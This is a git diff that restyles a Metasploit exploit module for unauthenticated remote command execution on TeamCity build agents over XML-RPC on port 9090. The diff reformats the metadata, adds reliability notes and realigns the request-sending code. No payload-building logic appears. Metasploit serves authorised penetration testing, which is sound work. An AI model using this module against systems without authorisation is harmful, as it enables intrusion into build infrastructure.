@@ -10,30 +10,37 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::CmdStager
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'TeamCity Agent XML-RPC Command Execution',
-      'Description'    => %q(
-        This module allows remote code execution on TeamCity Agents configured
-        to use bidirectional communication via xml-rpc. In bidirectional mode
-        the TeamCity server pushes build commands to the Build Agents over port
-        TCP/9090 without requiring authentication. Up until version 10 this was
-        the default configuration. This module supports TeamCity agents from
-        version 6.0 onwards.
-      ),
-      'Author'         => ['Dylan Pindur <dylanpindur@gmail.com>'],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'TeamCity Agent XML-RPC Command Execution',
+        'Description' => %q{
+          This module allows remote code execution on TeamCity Agents configured
+          to use bidirectional communication via xml-rpc. In bidirectional mode
+          the TeamCity server pushes build commands to the Build Agents over port
+          TCP/9090 without requiring authentication. Up until version 10 this was
+          the default configuration. This module supports TeamCity agents from
+          version 6.0 onwards.
+        },
+        'Author' => ['Dylan Pindur <dylanpindur@gmail.com>'],
+        'License' => MSF_LICENSE,
+        'References' => [
           ['URL', 'https://www.tenable.com/plugins/nessus/94675']
         ],
-      'Platform'       => %w[linux win],
-      'Targets'        =>
-        [
+        'Platform' => %w[linux win],
+        'Targets' => [
           ['Windows', { 'Platform' => 'win' }],
           ['Linux', { 'Platform' => 'linux' }]
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2015-04-14'))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2015-04-14',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     deregister_options('SRVHOST', 'SRVPORT', 'URIPATH', 'VHOST')
     register_options(
@@ -141,10 +148,10 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     res = send_request_cgi(
       {
-        'uri'    => '/',
+        'uri' => '/',
         'method' => 'POST',
-        'ctype'  => 'text/xml',
-        'data'   => xml_payload.strip!
+        'ctype' => 'text/xml',
+        'data' => xml_payload.strip!
       },
       10
     )
@@ -164,10 +171,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def send_request(xml_payload)
     res = send_request_cgi(
       {
-        'uri'    => '/',
+        'uri' => '/',
         'method' => 'POST',
-        'ctype'  => 'text/xml',
-        'data'   => xml_payload
+        'ctype' => 'text/xml',
+        'data' => xml_payload
       },
       10
     )
